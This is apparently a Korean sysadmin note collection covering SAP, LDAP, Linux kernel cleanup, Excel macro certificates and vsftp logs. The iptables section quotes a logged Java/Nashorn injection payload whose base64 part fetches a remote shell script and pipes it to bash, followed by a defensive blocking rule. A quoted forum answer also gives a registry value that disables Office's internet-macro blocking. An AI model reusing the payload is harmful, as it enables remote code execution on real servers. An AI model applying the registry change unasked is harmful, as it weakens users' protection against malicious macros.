[SAP] Product Route Archiving

Route 삭제는 두 개의 프로그램을 통하여 가능함.

Tcode QSR6

Tcode SARA

PP_PLAN Object에서 삭제하여 대상은 Write에서 진행함.

[LDAP]_LDAP 명령어

 

Ldap 명령어

 # ldapsearch -x -D 'cn=vmail,dc=xxxx,dc=xx' -H 'ldap://xx.xx.xx.xx:389' -W -b 'o=domains,dc=xxxx,dc=xx' '(domainName=*)'

 -D 'cn=.....' : 조회를 위한 사용자 정보

 -H 'ldap....' : 로그인 서버 정보

 -b 'o=domains,dc=xxxx,dc=xx' '(domainName=*)'   : 조회시작지점과 조회 조건

Enter LDAP Password:
# extended LDIF
#
# LDAPv3
# base <o=domains,dc=qnct,dc=cn> with scope subtree
# filter: (domainName=*)
# requesting: ALL
#

# xxxx.xx, domains, xxxx.xx
dn: domainName=xxxx.xx,o=domains,dc=xxxx,dc=xx
objectClass: mailDomain
domainName: xxxx.xx
mtaTransport: dovecot
accountSetting: minPasswordLength:8
accountSetting: defaultQuota:1024
enabledService: mail
cn: xxxxxxxxxxxxxxxxxxxxxxxx
accountStatus: active
domainCurrentUserNumber: 194
domainCurrentQuotaSize: 1887436800

# xxx.xxx, domains, xxxx.xx
dn: domainName=xxx.xxx,o=domains,dc=xxxx,dc=xx
objectClass: mailDomain
domainName: xxx.xxx
mtaTransport: dovecot
enabledService: mail
accountSetting: minPasswordLength:8
cn: xxxxxxxx
accountStatus: active
domainCurrentUserNumber: xxx
domainCurrentQuotaSize: 1153433600

# search result
search: 2
result: 0 Success

# numResponses: 3
# numEntries: 2

* LDAP로 항목 추가하기(빨간색이 입력하는 내용임)

# ldapmodify -a -D cn=Manager,dc=xxxx,dc=xx -W -H ldap://xxx.xxx.xxx.xxx:389 -x
Enter LDAP Password: xxxxxxxxxx
dn: mail=xxxx@xxxx.xxx,ou=Users,domainName=xxxx.xxx,o=domains,dc=xxxx,dc=xxx
changetype: modify
add: mailForwardingAddress
mailForwardingAddress: xxxx@xxxx.xxx
<--엔터를 쳐야 modify 메세지가 보임
modifying entry "mail=xxxx@xxxx.xxx,ou=Users,domainName=xxxx.xxx,o=domains,dc=xxxx,dc=xxx"

[ABAP]_ABAP 소스 다운로드 프로그램

 [ 소스다운 ]   사용법

프로그램은 charset을 EUC-KR로 적용한 것으로 실행시 한글이 깨질경우 SAPGUI 설정을 

아래와 같이 변경해야 한다.

 

[Linux] Iptables로 특정 텍스트 포함시 차단하기

 [출처 : https://jinane.tistory.com/ ]

 

외부에 열어 놓은 웹서버에 아래와 같은 로그가 여러 외부 IP에서 접속 이력 존재함

[Wed Jan 24 08:16:00.698387 2024] [core:error] [pid 184842] (36)File name too long: [client xxx.xxx.xxx.xxx:37814] AH00036: access to /${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK|base64 -d|bash').start()")}/ failed (filesystem path '/home/sapapi/public_html/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK|base64 -d|bash').start()")}')
 

로그 메세지상에 특정 텍스트 포함시 차단을 진행함.

#  iptables -I INPUT -p tcp --dport 80 -m string --string "javax.script.ScriptEngineManager" --algo bm -j DROP

[Linux]_Boot 파티션 용량 full 해결법(Rocky linux)

  [ 출처 :  https://www.centlinux.com/ ]

 

리눅스는 기본적으로 과거 커널을 5개까지 보관하고 있는데 이로 인하여 /Boot 파티션 용량이 full이 되면서 업데이트가 되지 않는 경우가 발생함.

# cat /etc/yum.conf  <--아래 보관횟수 확인 가능

[main]
gpgcheck=1
installonly_limit=3
clean_requirements_on_remove=True
best=True
skip_if_unavailable=False

# rpm -q kernel  <--설치된 kernel 확인
kernel-5.14.0-162.6.1.el9_1.0.1.x86_64
kernel-5.14.0-284.25.1.el9_2.x86_64
kernel-5.14.0-284.30.1.el9_2.x86_64

# grubby --default-kernel  <-- 사용중인 kernel 확인
/boot/vmlinuz-5.14.0-284.30.1.el9_2.x86_64

* 과거 커널을 삭제 하는 방법

# dnf -y remove --oldinstallonly --setopt installonly_limit=2 kernel
Dependencies resolved.
==============================================================================================================================================================================================
 Package                                           Architecture                         Version                                                Repository                                Size
==============================================================================================================================================================================================
Removing:
 kernel                                            x86_64                               5.14.0-162.6.1.el9_1.0.1                               @anaconda                                  0
 kernel                                            x86_64                               5.14.0-284.25.1.el9_2                                  @baseos                                    0
 kernel-core                                       x86_64                               5.14.0-162.6.1.el9_1.0.1                               @anaconda                                 84 M
 kernel-core                                       x86_64                               5.14.0-284.25.1.el9_2                                  @baseos                                   56 M
 kernel-devel                                      x86_64                               5.14.0-162.6.1.el9_1.0.1                               @AppStream                                60 M
 kernel-devel                                      x86_64                               5.14.0-284.25.1.el9_2                                  @appstream                                63 M
 kernel-modules                                    x86_64                               5.14.0-162.6.1.el9_1.0.1                               @anaconda                                 31 M
 kernel-modules                                    x86_64                               5.14.0-284.25.1.el9_2                                  @baseos                                   33 M
 kernel-modules-core                               x86_64                               5.14.0-284.25.1.el9_2                                  @baseos                                   31 M

Transaction Summary
==============================================================================================================================================================================================
Remove  9 Packages

Freed space: 357 M
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                                                                                                                                      1/1
  Erasing          : kernel-5.14.0-284.25.1.el9_2.x86_64                                                                                                                                  1/9
  Running scriptlet: kernel-5.14.0-284.25.1.el9_2.x86_64                                                                                                                                  1/9
  Erasing          : kernel-modules-5.14.0-284.25.1.el9_2.x86_64                                                                                                                          2/9
  Running scriptlet: kernel-modules-5.14.0-284.25.1.el9_2.x86_64                                                                                                                          2/9
  Erasing          : kernel-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                               3/9
  Running scriptlet: kernel-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                               3/9
  Erasing          : kernel-modules-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                       4/9
  Running scriptlet: kernel-modules-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                       4/9
  Erasing          : kernel-modules-core-5.14.0-284.25.1.el9_2.x86_64                                                                                                                     5/9
  Running scriptlet: kernel-modules-core-5.14.0-284.25.1.el9_2.x86_64                                                                                                                     5/9
  Running scriptlet: kernel-core-5.14.0-284.25.1.el9_2.x86_64                                                                                                                             6/9
  Erasing          : kernel-core-5.14.0-284.25.1.el9_2.x86_64                                                                                                                             6/9
warning: file /lib/modules/5.14.0-284.25.1.el9_2.x86_64/modules.builtin.modinfo: remove failed: No such file or directory
warning: file /lib/modules/5.14.0-284.25.1.el9_2.x86_64/modules.builtin: remove failed: No such file or directory

  Running scriptlet: kernel-core-5.14.0-284.25.1.el9_2.x86_64                                                                                                                             6/9
  Running scriptlet: kernel-core-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                          7/9
  Erasing          : kernel-core-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                          7/9
  Running scriptlet: kernel-core-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                          7/9
  Erasing          : kernel-devel-5.14.0-284.25.1.el9_2.x86_64                                                                                                                            8/9
  Erasing          : kernel-devel-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                         9/9
  Running scriptlet: kernel-devel-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                         9/9
  Verifying        : kernel-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                               1/9
  Verifying        : kernel-5.14.0-284.25.1.el9_2.x86_64                                                                                                                                  2/9
  Verifying        : kernel-core-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                          3/9
  Verifying        : kernel-core-5.14.0-284.25.1.el9_2.x86_64                                                                                                                             4/9
  Verifying        : kernel-devel-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                         5/9
  Verifying        : kernel-devel-5.14.0-284.25.1.el9_2.x86_64                                                                                                                            6/9
  Verifying        : kernel-modules-5.14.0-162.6.1.el9_1.0.1.x86_64                                                                                                                       7/9
  Verifying        : kernel-modules-5.14.0-284.25.1.el9_2.x86_64                                                                                                                          8/9
  Verifying        : kernel-modules-core-5.14.0-284.25.1.el9_2.x86_64                                                                                                                     9/9

Removed:
  kernel-5.14.0-162.6.1.el9_1.0.1.x86_64            kernel-5.14.0-284.25.1.el9_2.x86_64        kernel-core-5.14.0-162.6.1.el9_1.0.1.x86_64     kernel-core-5.14.0-284.25.1.el9_2.x86_64
  kernel-devel-5.14.0-162.6.1.el9_1.0.1.x86_64      kernel-devel-5.14.0-284.25.1.el9_2.x86_64  kernel-modules-5.14.0-162.6.1.el9_1.0.1.x86_64  kernel-modules-5.14.0-284.25.1.el9_2.x86_64
  kernel-modules-core-5.14.0-284.25.1.el9_2.x86_64

Complete!

 

Centos는 아래 링크 참조

https://www.runit.cloud/

 

[ABAP]_엑셀 다운로드시 매크로 관련 오류

 [ 출처 : https://answers.sap.com/ ]

As per SAP Note 3247649 , the certificate needs to be installed manually under Trusted Publishers by each user or can be done through group policies. In order to get the certificate you need to at least have any one specific user/system who can export the certificate from the templates present in attachment of SAP Note 1992004 and also make sure the steps are performed in system.

[ 출처 : https://help.sap.com/ ]

1 - SAP SE certificate

• The SAP SE certificate is delivered with the front end installation.
• You can find the SAP SE certificate here: 
  • MS Excel > Options > Trust Center > Trust Center Settings > Trusted Publishers
  • MS Internet Explorer > Internet Options > Content > Certificates > TAB Trusted Publishers
• On the "General" tab , you can check the validity.
• On the "Certification Path" tab ,the path should be displayed as shown in following screenshot and the message "This certificate is OK" should be shown:
  
  

2 - How to remove an expired SAP SE certificate?

• Check folder C:\Program Files (x86)\SAP\Business Explorer\BI you can find the file BExAddin.dll. In the context menu for this file open the properties and switch to tab "Digital Signatures". You will find the SAP SE certificate. Press the button "Details" and then button "View Certificate" to see the validity of this certificate. As long any file has the "SAP SE certificate", irrelevant of the validity date, you can be assured that the file is a part of SAP certified software. The validity only shows the time period that SAP can use this certificate to certify a file. 

• Now you can find the expired SAP public key in Internet Explorer, Microsoft Edge or Excel Options under Trusted Publisher. The key is updated according to the setting/rules/option maintained in operating system.
• If the validity of this key is expired, you can remove the key following these steps: 

1. Start Microsoft Edge
2. Open More Tools > Internet Options > on TAB Content > press button Certificates.  
3. Under Trusted Publisher select SAP SE certificate and press button Remove:

3 - How to import the SAP SE certificate manually?

If you cannot find the certificate or you want to replace an expired certificate perform these steps:

1. In Microsoft Edge > More Tools > Internet Options > Advanced tab, activate the flag "Check for publisher's certificate revocation":
   
   
2. In Excel > Trust Center make sure that the following properties are active:
1. Add-ins:
1. [x] Require Application Add-ins to be signed by Trusted Publisher:
   
   
   
2. Macro Settings according note 1962327: 
   1. (o) Disable all macros except digitally signed macros
   2. [x] Trust access to the VBA project object model:
      
      
      
3. Close Internet Explorer and Excel.
4. RESTART THE WORKSTATION
5. Confirm the settings are still there on Excel and proceed
6. Open folder C:\Program Files (x86)\Common Files\SAP Shared\BW.
7. Start BExAnalyzer.xla file.
8. MS Excel opens and a MS Excel Security PopUp asks for confirmation:
   
   
   
9. Press button 'Trust all from publisher'. This imports the SAP SE certificate under the Trusted Publishers path.

Note:

• Each certificate has a limited validity, it expires on a certain date. A new certificate with updated/extended validity is delivered with the BEx front end patch (see: Current BI ADDON for SAP GUI 760).
• SAP releases the next patch before the old certificate expires, so you just have to install the newest patch to have a valid certificate.
• If the root certificate 'VeriSign Class 3 Code Signing 2010 CA' has been expired, you will have to update it as described in note 711648.

 

4 - Certificates in workbooks

• A new created workbook which is based on the SAP default workbook is signed and saved with the current installed certificate. So in the workbook a certificate exists with a limited validity.
• When opening an old workbook containing an expired certificate you will receive a warning from Excel stating that the certificate with which the workbook was signed has expired. The warning messages state that the signature is invalid. It is not really a problem since it is just informing you about the status of the workbook. You can still work with the workbook.
• When you save a workbook containing an expired digital certificate Excel automatically removes the invalid certificate from the workbook before saving it.

Note:

• The SAP delivered SAP Default Workbook contains macros. For security reasons this workbook has to be digitally signed so that customers know that the workbook is from SAP and safe to use.
• Workbooks which have been created by the customer do not necessarily require a signature. The customer determines if the workbook should be saved with a digital signature or not. If it is saved with a digital signature then the signature is typically the signature of the customer whom the workbook belongs to.

Here is how you can find the workbook certificate/signature:

• Open the workbook > press Alt+F11 > in MS VB navigate: Tools > Digital Signature
  
  
  
  
  

---

SAP Note 711648 - Macro certificate signature not verified

 

[ 출처 : https://answers.microsoft.com/ ]

Macros from the internet will be blocked by default in Office: Block macros from running in Office files from the Internet

https://docs.microsoft.com/en-us/DeployOffice/security/internet-macros-blocked#block-macros-from-running-in-office-files-from-the-internet

매크로 보안 관련하여 기본 디자인이 최근에 바뀌었습니다. 여기서 이 레지스트리가 ‘구성되지 않음’ 상태일 경우 원래는 Office 앱의 보안 센터 설정을 따라가는 것이 기본 디자인이었으나, 이제는 ‘구성되지 않음’ 상태인 경우에도 Office 앱의 보안 설정과 상관없이 차단하는 것으로 디자인이 바뀐 것으로 보입니다.

Windows Registry Editor Version 5.00

 

[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\office\16.0\excel\security]

"blockcontentexecutionfrominternet"=dword:00000000

 

위 내용을 그대로 복사하여 메모장에 붙여넣고, .reg 파일로 저장한 뒤 실행하여 병합합니다.

(메모장에서 저장시 '파일 형식'을 모든 파일로 지정하고 파일 이름 뒤 .reg를 붙이면됩니다)

 

 

 

이후 재부팅한 뒤, 매크로 파일을 열어보는 작업을 진행해 보시기 바랍니다.

 

이 레지스트리는 인터넷에서 다운로드된 오피스 파일에 포함된 매크로를 차단하는 것을 명시적으로 사용하지 않게 설정합니다.

 

이렇게 하면 Office 프로그램이 Excel 보안 센터의 매크로 설정을 따르게끔 조치할 수 있을 것으로 보입니다.

 

 

 

 

 

또한 매크로 설정을 위와 같이 매크로를 사용하는 쪽으로 모두 변경해 주셔야 할 수 있습니다.

 

인터넷에서 다운로드 된 파일에 포함된 매크로는 기본적으로 차단되는 것이 Microsoft의 권장 사항이며, 아무 조건 없이 실행시키도록 구성하는 것은 컴퓨터 보안 측면에서 위험할 수도 있습니다.

Microsoft Community를 이용해주셔서 감사합니다.

안내 드린 답변이 도움이 되었기를 바라며, 문제가 해결되지 않았거나 추가 질문이 있으실 경우

[응답] 버튼을 눌러 답변 부탁드립니다.

감사합니다.

 

 

 

[Linux]_VSFTP 로그 파일 포맷

 [ 출처 : https://docs.oracle.com/ ]

The xferlog file contains transfer logging information from the FTP Server, in.ftpd(1M). You can use the logfile capability to change the location of the log file. See ftpaccess(4).

Each server entry is composed of a single line of the following form. All fields are separated by spaces.

current-time  transfer-time    remote-host  file-size  filename  
transfer-type  special-action-flag  direction access-mode  username
service-name  authentication-method  authenticated-user-id completion-status

The fields are defined as follows:

current-time

    The current local time in the form DDD MMM dd hh:mm:ss YYYY, where:

    DDD    :    Is the day of the week
    MMM   :    Is the month
    dd        :    Is the day of the month
    hh        :     Is the hour
    mm      :     Is the minutes
    ss        :     Is the seconds
    YYYY   :     Is the year

transfer-time
    The total time in seconds for the transfer

remote-host
    The remote host name

file-size
    The number of bytes transferred

filename
    The name of the transferred file

transfer-type
    A single character indicating the type of transfer:
    a   :     Indicates an ascii transfer
    b   :     Indicates a binary transfer

special-action-flag
    One or more single character flags that indicate any special action taken. The special-action-flag can have one of more of the following values:
    C   :    File was compressed
    U   :    File was uncompressed
    T   :    File was archived, for example, by using tar(1)

    _ (underbar)
        No action was taken.

direction
    The direction of the transfer. direction can have one of the following values:
    o   :   Outgoing
    i    :    Incoming

access-mode
    The method by which the user is logged in. access-mode can have one of the following values:
    a   :    For an anonymous user.
    g   :    For a passworded guest user. See the description of the guestgroup capability in ftpaccess(4).
    r   :     For a real, locally authenticated user

username
    The local username, or if anonymous, the ID string given

service-name
    The name of the service invoked, usually ftp

authentication-method
    The method of authentication used. authentication-method can have one of the following values:
    0   :    None
    1   :    RFC 931 authentication

authenticated-user-id
    The user ID returned by the authentication method. A * is used if an authenticated user ID is not available.

completion-status
    A single character indicating the status of the transfer. completion-status can have one of the following values:
    c   :     Indicates complete transfer
    i    :     Indicates incomplete transfer